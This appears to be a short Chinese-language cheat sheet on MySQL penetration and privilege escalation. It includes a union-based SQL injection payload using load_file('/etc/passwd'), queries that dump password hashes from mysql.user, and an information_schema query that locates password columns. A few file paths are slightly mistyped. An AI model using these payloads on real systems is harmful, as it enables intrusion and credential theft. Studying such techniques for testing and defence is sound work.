mysql 漏洞利用与提权
判断MySQL服务运行的权限
1、查看系统账号,如果出现MySQL这类用户,意味着系统可能出现了降权。
2、看mysqld运行的priority值。
3、查看端口是否可外联。
MySQL密码获取与破解
1、获取网站数据库账号和密码
2、获取MySQL数据库user表
用户一共有三个文件,即user.frm、user.MYD、user.MYI,MySQL数据库用户密码都保存在user.MYD文件中,包括root用户和其他用户密码。
MySQL密码查询
select user,password from mysql.user;
select user,password from mysql.user where user = 'root';
mysql 渗透技巧
如果发现一个PHP的SQL 注入点,可以通过构造"-1 union select 1,1,1,1,1,load_file('/etc/passwd')"
直接读取的配置文件的命令如下
select load_file('/etc/passwd')\
select load_file('/etc/issues')
select load_file('/etc/etc/rc.local')
一些常见的MySQL命令
show databases;
use testdatabases; 使用某个数据库
show tables;
select * from a 查询a表中所有的数据
select @@datadir; 查询数据库的路径
select @@basedir 查询mysql的安装路径
常用内置函数
select system_user() 查询系统
select current_user() 查询用户
select user() 查询用户
select version() 查询数据库版本
select database() 查询当前连接的数据库
select @@version_compile_os查询当前操作系统
select now() 显示当前时间
快速定位数据库中涉及的密码表
select table_schema,table_name,column_name from information_schema.columns where column_name like ‘%password%’;